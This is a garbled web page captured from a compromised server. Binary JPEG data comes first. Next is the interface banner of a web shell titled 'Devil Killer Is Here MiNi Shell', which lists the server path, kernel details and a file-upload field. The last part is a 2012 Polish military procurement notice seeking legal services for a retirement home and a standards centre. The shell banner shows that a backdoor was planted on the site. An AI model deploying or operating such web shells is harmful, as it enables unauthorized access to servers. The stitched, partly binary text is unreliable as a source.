JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/87016-N-2012.html

<p class="kh_header"><b>Warszawa: Świadczenie usług prawniczych oraz usług w zakresie zastępstwa procesowego dla potrzeb instytucji będących na zaopatrzeniu logistycznym JW 2063</b><br>
<b>Numer ogłoszenia: 87016 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824215, 6824375, 6824121, faks 22 6824108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowienia.ozdgw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług prawniczych oraz usług w zakresie zastępstwa procesowego dla potrzeb instytucji będących na zaopatrzeniu logistycznym JW 2063.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje świadczenie obsługi prawnej oraz zastępstwa procesowego na rzecz instytucji będących na zaopatrzeniu logistycznym Jednostki Wojskowej 2063, o których mowa w ust. 2, zwanymi w treści umowy USŁUGODAWCAMI, określonego według kodu CPV - 79.11.10.00-5 usługi prawnicze.
2.	Przedmiot zamówienia został podzielony na dwie części:

I część - Dom Emeryta Wojskowego
II część- Wojskowe Centrum Jakości  Normalizacji i Kodyfikacji


3.	Formularz Cenowy- Oferta Wykonawcy stanowi załącznik nr 2 do SIWZ

Cz- I Domu Emeryta Wojskowego:

1.	Udzielanie porad i konsultacji prawnych dyrektorowi DEW i innym pracownikom DEW, 
2.	Udzielanie porad i konsultacji prawnych dyrektorowi DEW i innym pracownikom DEW, 
3.	Sporządzanie opinii prawnych i wyjaśnień w zakresie stosowania prawa, związanych 
z pracą wykonaną w DEW;
4.	Informuje Dyrektora DEW o zmianach w obowiązującym stanie prawnym związanym  
z pracą wykonywaną w zakresie działalności DEW oraz o uchybieniach działalności  DEW w zakresie przestrzegania przepisów prawnych związanych z pracą wykonywaną oraz skutkach tych uchybień,  
5.	Sprawowanie zastępstwa procesowego DEW, występowanie w charakterze pełnomocnika przed organami orzekającymi, opiniowanie pod względem prawnym spraw związanych
 z postępowaniem przed tymi organami, w tym również postępowaniem wyjaśniającym 
w sprawach szkód i wypadków oraz w sprawach dotyczących stosunków pracy, a także sprawowanie pomocy prawnej przy egzekucji wierzytelności DEW, 
6.	Opiniowanie pod względem prawnym: decyzji w sprawach indywidualnych wydawanych przez dyrektora DEW, decyzji o odmowie uznania zgłoszonych roszczeń, umorzenia lub odroczenia 	spłaty lub rozłożenia na raty należności, spisywania w straty  nieściągalnych należności, strat powstałych w środkach trwałych, zawiadomienia organu powołanego do ścigania przestępstw o stwierdzeniu przestępstwa ściganego z urzędu, 
7.	Opracowywanie projektów dokumentów dotyczących udzielenie  zamówienia publicznego ze środków pozostających w dyspozycji DEW, 
8.	Przygotowywania projektów umów i ugód w sprawach majątkowych, 
9.	Opiniowanie spraw pracowniczych oraz przygotowywanie odpowiednich propozycji ich rozwiązania albo odpowiednich pism procesowych,
10.	Uzgadnianie z pracownikiem sekcji  finansowej  sposobów egzekwowania wierzytelności  DEW, w szczególności  związanych  z nieterminową płatnością za pobyt w DEW,
11.	Opracowywanie lub opiniowanie pod względem prawnym standardów  pobytu w DEW,
12.	Wyjaśnianie sposobu załatwienia spraw indywidualnych mieszkańców DEW, w tym  zwłaszcza dotyczących dziedziczenia, zapisów, darowizn, przenoszenia własności itp.,  
13.	Uczestnictwo w  opiniowaniu  projektów  aktów  normatywnych uzgadnianych z DEW oraz opracowywanie projektów wydawanych w DEW dokumentów o charakterze normatywnym, decyzji administracyjnych,  postanowień  i  innych  aktów  z zakresu administracji publicznej dotyczących przyznania, stwierdzenia albo uznania uprawnienia lub obowiązku, wynikających z przepisów prawa, 
14.	Uczestnictwo w prowadzonych przez dyrektora DEW rokowaniach związanych 
z realizacją przez DEW zadań, w szczególności na szczeblu Departamentu Spraw Socjalnych MON oraz Jednostki Wojskowej Nr 2063, 
15.	Dyżur - w siedzibie DEW, Warszawa ul. Pirenejska 5, jeden raz w tygodniu w wymiarze co najmniej 2-4 godz., czas realizacji pomocy prawnej w godz., pomiędzy 13,00-17,00 (konkretny dzień tygodnia, ilość godzin oraz godziny świadczenia pomocy prawnej do odrębnego ustalenia); niezbędny jest stały dostęp telefoniczny do osoby świadczącej pomoc prawną oraz możliwość stałego porozumiewania się na odległość za pomocą faksów i e-maili; pożądana jest również dostępność osoby świadczącej pomoc prawną na żądanie w innych dniach tygodnia w czasie (dzień i godziny) uzgodnionym z dyrektorem DEW lub pracownikiem merytorycznym DEW. W ramach godzin świadczenia pomocy prawnej osoba wykonująca usługę obowiązana będzie również zapewnić dostęp dla mieszkańców DEW, w sprawach związanych z ich pobytem w placówce, a wymagających omówienia przy udziale prawnika. W czas świadczenia pomocy prawnej nie wliczany jest czas wykonywania zastępstwa procesowego, którego wymiar i faktyczne godziny uzależnione są od rodzaju prowadzonych spraw. Zastępstwo procesowe obejmuje obszar całego kraju oraz rodzajowo wszystkie sprawy (cywilne, administracyjne, karne itp.).  
16. Wymagania:  
1)	legitymowanie się wpisem na listę radców prawnych lub listę adwokatów prowadzonych przez właściwe okręgowe izby tych korporacji zawodowych.
2)	doświadczenie wykonywania obsługi prawnej na rzecz instytucji (placówek) o charakterze pomocy społecznej lub podobnych, co najmniej przez okres 3 lat; 
3)	poświadczenie bezpieczeństwa upoważniającym go do dostępu do informacji niejawnych stanowiących tajemnicę państwową, co najmniej oznaczonych klauzulą ,,zastrzeżone;  
4)	kompleksowe prowadzenie sprawy przez jedną osobę, bez możliwości ich podzlecania innej osobie zachowując dbałość o należyte jej wykonanie z zachowaniem ochrony uzasadnionych interesów DEW;  
5)	znajomość prawa: pracy, cywilnego, gospodarczego, postępowania administracyjnego, postępowania cywilnego, finansów publicznych, gospodarki budżetowej jednostek sektora finansów publicznych, pomocy społecznej, ubezpieczeń społecznych i zdrowotnych, opieki zdrowotnej, gospodarki materiałowej w jednostkach sektora finansów publicznych, zaopatrzenia emerytalnego żołnierzy i rencistów wojskowych, spraw socjalnych i pomocy społecznej, a także wykazywać się kreatywnością, kulturą języka w mowie i w piśmie, umiejętnością nawiązywania kontaktu z osobami w wieku podeszłym.
Cz- II Wojskowe Centrum Normalizacji Jakości i Kodyfikacji:
1. Okres świadczenia usługi: do 31 czerwca 2012r. od daty podpisania Umowy z wybranym Wykonawcą;
2. Dyżur-w siedzibie WCNJiK, Warszawa, ul. Plac Józefa Piłsudskiego 4, dwa razy w tygodniu-wtorek i środa w wymiarze 4,5 godz., czas realizacji pomocy prawnej w godz., pomiędzy 7.30-12.00
3. Wymagania:
1)	Uczestnictwo w tworzeniu aktów prawnych z obszaru normalizacji, zapewnienia jakości i kodyfikacji, w tym znajomość m.in.:
- Ustawy z dnia 12 września 2002r. o normalizacji;
- Rozporządzenia Rady Ministrów z 23 grudnia 2002r. w sprawie działalności normalizacyjnej związanej z obronnością i bezpieczeństwem państwa;
- Decyzji Nr 388/MON Ministra Obrony narodowej z dnia 21 października 2011 r. 
w sprawie powołania i organizacji służby normalizacyjnej oraz określenia zakresu zadań wojskowego Centrum Normalizacji Jakości i Kodyfikacji;
- Ustawy z dnia 17 listopada 2006 r. o systemie oceny zgodności wyrobów przeznaczonych na potrzeby obronności i bezpieczeństwa państwa;
2. Znajomość obszarów: normalizacji, zapewnienia jakości i kodyfikacji na poziomie krajowym i międzynarodowym (UE i NATO), w tym szczególnie podstaw prawnych funkcjonowania, organizacji działalności i dokumentów regulujących ww. obszary działalności.
3. Uczestnictwo w negocjacjach i zawieraniu umów cywilno-prawnych na prace normalizacyjne,
4.   Znajomość procedury normalizacyjnej w resorcie obrony narodowej, w tym działalności realizowanej w obszarze obronności na szczeblu krajowym przez Komitet Techniczny Nr 176. ds. techniki wojskowej i zaopatrzenia oraz na poziomie resortu obrony narodowej Wojskowego Komitetu Normalizacyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na potwierdzenie wiedzy i doświadczenia Zamawiający wymaga załączenia:
a)	wykazu wykonywanych usług (co najmniej 2 usług) w zakresie niezbędnym do wykazania spełniania warunku wiedzy 
i doświadczenia tj.: świadczenie doradztwa prawnego, zastępstwa procesowego w zakresie bieżącej obsługi prawnej jednostek sektora finansów publicznych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na kwotę nie mniejszą niż cena brutto składanej oferty (każda) (na formularzu określonym w Zał. nr 4 do SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania iodbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu osób , które będą uczestniczyć w realizacji zamówienia, posiadających doświadczenie w zawodzie radcy prawnego lub adwokata wraz 
z informacjami na temat ich kwalifikacji zawodowych i uprawnień (określonym w Zał. Nr 5 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Doświadczenia - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.ozdgw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wykonawca może zwrócić się pisemnie na adres Zamawiającego tj.Jednostka Wojskowa 2063, ul.Banacha 2, 00-909 Warszawa lub faksem na numer (22) 6824 108 z prośbą o SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 08:45, miejsce: JEDNOSTKA WOJSKOWA 2063,UL.BANACHA 2, 00-909 WARSZAWA,POKÓJ 117 (KANCELARIA).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOM EMERYTA WOJSKOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Udzielanie porad i konsultacji prawnych dyrektorowi DEW i innym pracownikom DEW, 
2.	Udzielanie porad i konsultacji prawnych dyrektorowi DEW i innym pracownikom DEW, 
3.	Sporządzanie opinii prawnych i wyjaśnień w zakresie stosowania prawa, związanych 
z pracą wykonaną w DEW;
4.	Informuje Dyrektora DEW o zmianach w obowiązującym stanie prawnym związanym  
z pracą wykonywaną w zakresie działalności DEW oraz o uchybieniach działalności  DEW w zakresie przestrzegania przepisów prawnych związanych z pracą wykonywaną oraz skutkach tych uchybień,  
5.	Sprawowanie zastępstwa procesowego DEW, występowanie w charakterze pełnomocnika przed organami orzekającymi, opiniowanie pod względem prawnym spraw związanych
 z postępowaniem przed tymi organami, w tym również postępowaniem wyjaśniającym 
w sprawach szkód i wypadków oraz w sprawach dotyczących stosunków pracy, a także sprawowanie pomocy prawnej przy egzekucji wierzytelności DEW, 
6.	Opiniowanie pod względem prawnym: decyzji w sprawach indywidualnych wydawanych przez dyrektora DEW, decyzji o odmowie uznania zgłoszonych roszczeń, umorzenia lub odroczenia 	spłaty lub rozłożenia na raty należności, spisywania w straty  nieściągalnych należności, strat powstałych w środkach trwałych, zawiadomienia organu powołanego do ścigania przestępstw o stwierdzeniu przestępstwa ściganego z urzędu, 
7.	Opracowywanie projektów dokumentów dotyczących udzielenie  zamówienia publicznego ze środków pozostających w dyspozycji DEW, 
8.	Przygotowywania projektów umów i ugód w sprawach majątkowych, 
9.	Opiniowanie spraw pracowniczych oraz przygotowywanie odpowiednich propozycji ich rozwiązania albo odpowiednich pism procesowych,
10.	Uzgadnianie z pracownikiem sekcji  finansowej  sposobów egzekwowania wierzytelności  DEW, w szczególności  związanych  z nieterminową płatnością za pobyt w DEW,
11.	Opracowywanie lub opiniowanie pod względem prawnym standardów  pobytu w DEW,
12.	Wyjaśnianie sposobu załatwienia spraw indywidualnych mieszkańców DEW, w tym  zwłaszcza dotyczących dziedziczenia, zapisów, darowizn, przenoszenia własności itp.,  
13.	Uczestnictwo w  opiniowaniu  projektów  aktów  normatywnych uzgadnianych z DEW oraz opracowywanie projektów wydawanych w DEW dokumentów o charakterze normatywnym, decyzji administracyjnych,  postanowień  i  innych  aktów  z zakresu administracji publicznej dotyczących przyznania, stwierdzenia albo uznania uprawnienia lub obowiązku, wynikających z przepisów prawa, 
14.	Uczestnictwo w prowadzonych przez dyrektora DEW rokowaniach związanych 
z realizacją przez DEW zadań, w szczególności na szczeblu Departamentu Spraw Socjalnych MON oraz Jednostki Wojskowej Nr 2063, 
15.	Dyżur - w siedzibie DEW, Warszawa ul. Pirenejska 5, jeden raz w tygodniu w wymiarze co najmniej 2-4 godz., czas realizacji pomocy prawnej w godz., pomiędzy 13,00-17,00 (konkretny dzień tygodnia, ilość godzin oraz godziny świadczenia pomocy prawnej do odrębnego ustalenia); niezbędny jest stały dostęp telefoniczny do osoby świadczącej pomoc prawną oraz możliwość stałego porozumiewania się na odległość za pomocą faksów i e-maili; pożądana jest również dostępność osoby świadczącej pomoc prawną na żądanie w innych dniach tygodnia w czasie (dzień i godziny) uzgodnionym z dyrektorem DEW lub pracownikiem merytorycznym DEW. W ramach godzin świadczenia pomocy prawnej osoba wykonująca usługę obowiązana będzie również zapewnić dostęp dla mieszkańców DEW, w sprawach związanych z ich pobytem w placówce, a wymagających omówienia przy udziale prawnika. W czas świadczenia pomocy prawnej nie wliczany jest czas wykonywania zastępstwa procesowego, którego wymiar i faktyczne godziny uzależnione są od rodzaju prowadzonych spraw. Zastępstwo procesowe obejmuje obszar całego kraju oraz rodzajowo wszystkie sprawy (cywilne, administracyjne, karne itp.).  
16. Wymagania:  
1)	legitymowanie się wpisem na listę radców prawnych lub listę adwokatów prowadzonych przez właściwe okręgowe izby tych korporacji zawodowych.
2)	doświadczenie wykonywania obsługi prawnej na rzecz instytucji (placówek) o charakterze pomocy społecznej lub podobnych, co najmniej przez okres 3 lat; 
3)	poświadczenie bezpieczeństwa upoważniającym go do dostępu do informacji niejawnych stanowiących tajemnicę państwową, co najmniej oznaczonych klauzulą ,,zastrzeżone;  
4)	kompleksowe prowadzenie sprawy przez jedną osobę, bez możliwości ich podzlecania innej osobie zachowując dbałość o należyte jej wykonanie z zachowaniem ochrony uzasadnionych interesów DEW;  
5)	znajomość prawa: pracy, cywilnego, gospodarczego, postępowania administracyjnego, postępowania cywilnego, finansów publicznych, gospodarki budżetowej jednostek sektora finansów publicznych, pomocy społecznej, ubezpieczeń społecznych i zdrowotnych, opieki zdrowotnej, gospodarki materiałowej w jednostkach sektora finansów publicznych, zaopatrzenia emerytalnego żołnierzy i rencistów wojskowych, spraw socjalnych i pomocy społecznej, a także wykazywać się kreatywnością, kulturą języka w mowie i w piśmie, umiejętnością nawiązywania kontaktu z osobami w wieku podeszłym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wojskowe Centrum Normalizacji Jakości i Kodyfikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Okres świadczenia usługi: do 31 czerwca 2012r. od daty podpisania Umowy z wybranym Wykonawcą;
2. Dyżur-w siedzibie WCNJiK, Warszawa, ul. Plac Józefa Piłsudskiego 4, dwa razy w tygodniu-wtorek i środa w wymiarze 4,5 godz., czas realizacji pomocy prawnej w godz., pomiędzy 7.30-12.00
3. Wymagania:
1)	Uczestnictwo w tworzeniu aktów prawnych z obszaru normalizacji, zapewnienia jakości i kodyfikacji, w tym znajomość m.in.:
- Ustawy z dnia 12 września 2002r. o normalizacji;
- Rozporządzenia Rady Ministrów z 23 grudnia 2002r. w sprawie działalności normalizacyjnej związanej z obronnością i bezpieczeństwem państwa;
- Decyzji Nr 388/MON Ministra Obrony narodowej z dnia 21 października 2011 r. 
w sprawie powołania i organizacji służby normalizacyjnej oraz określenia zakresu zadań wojskowego Centrum Normalizacji Jakości i Kodyfikacji;
- Ustawy z dnia 17 listopada 2006 r. o systemie oceny zgodności wyrobów przeznaczonych na potrzeby obronności i bezpieczeństwa państwa;
